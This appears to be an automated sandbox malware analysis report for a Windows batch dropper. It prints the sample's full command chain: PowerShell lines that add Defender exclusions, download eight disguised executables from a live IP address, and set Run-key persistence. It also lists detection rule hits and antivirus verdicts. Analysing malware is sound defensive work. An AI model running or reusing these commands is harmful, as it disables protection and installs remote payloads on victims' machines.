Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 19, 2024, 9:30 a.m. | June 19, 2024, 9:33 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" C:\Users\test22\AppData\Local\Temp\lamda.cmd
2564-
-
powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
2724 -
powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\ProgramLogs'"
2836 -
powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
2928 -
powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramLogs'"
3020 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
1152 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
1484 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
2268 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
2468 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftNetwork.exe' -OutFile 'C:\ProgramLogs\MicrosoftNetwork.exe'"
2600 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftRegistry.exe' -OutFile 'C:\ProgramLogs\MicrosoftRegistry.exe'"
2832 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftSecurity.exe' -OutFile 'C:\ProgramLogs\MicrosoftSecurity.exe'"
2776 -
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftValidator.exe' -OutFile 'C:\ProgramLogs\MicrosoftValidator.exe'"
2940 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
2064 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
2204 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f
2368 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f
2456 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\ProgramLogs\MicrosoftNetwork.exe" /f
2580 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\ProgramLogs\MicrosoftRegistry.exe" /f
2128 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram7" /t REG_SZ /d "C:\ProgramLogs\MicrosoftSecurity.exe" /f
1304 -
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram8" /t REG_SZ /d "C:\ProgramLogs\MicrosoftValidator.exe" /f
2868
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftValidator.exe' -OutFile 'C:\ProgramLogs\MicrosoftValidator.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftNetwork.exe' -OutFile 'C:\ProgramLogs\MicrosoftNetwork.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftSecurity.exe' -OutFile 'C:\ProgramLogs\MicrosoftSecurity.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'" |
cmdline | powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'" |
cmdline | powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\ProgramLogs'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'" |
cmdline | powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftRegistry.exe' -OutFile 'C:\ProgramLogs\MicrosoftRegistry.exe'" |
cmdline | powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramLogs'" |
cmdline | powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'" |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\ProgramLogs\MicrosoftRegistry.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\ProgramLogs\MicrosoftNetwork.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram7" /t REG_SZ /d "C:\ProgramLogs\MicrosoftSecurity.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram8" /t REG_SZ /d "C:\ProgramLogs\MicrosoftValidator.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f |
cmdline | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram1 | reg_value | C:\RM\AntiVirus.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram2 | reg_value | C:\RM\AntiVirus2.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram3 | reg_value | C:\RM\AntiVirus3.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram4 | reg_value | C:\RM\AntiVirus4.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram5 | reg_value | C:\ProgramLogs\MicrosoftNetwork.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram6 | reg_value | C:\ProgramLogs\MicrosoftRegistry.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram7 | reg_value | C:\ProgramLogs\MicrosoftSecurity.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MainProgram8 | reg_value | C:\ProgramLogs\MicrosoftValidator.exe |
count | 1778 | name | heapspray | process | powershell.exe | total_mb | 111 | length | 65536 | protection | PAGE_READWRITE |
Skyhigh | BehavesLike.Backdoor.zq |
VIPRE | Heur.BZC.MNT.Boxter.928.2802D7D3 |
Arcabit | Heur.BZC.MNT.Boxter.928.2802D7D3 [many] |
ESET-NOD32 | PowerShell/TrojanDownloader.Agent.GEI |
BitDefender | Heur.BZC.MNT.Boxter.928.2802D7D3 |
MicroWorld-eScan | Heur.BZC.MNT.Boxter.928.2802D7D3 |
Emsisoft | Heur.BZC.MNT.Boxter.928.2802D7D3 (B) |
FireEye | Heur.BZC.MNT.Boxter.928.2802D7D3 |
Kingsoft | Win32.Troj.Undef.a |
GData | Heur.BZC.MNT.Boxter.928.2A4E69C7 |
MAX | malware (ai score=81) |
alibabacloud | Trojan[downloader]:Win/BZC.MTB |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |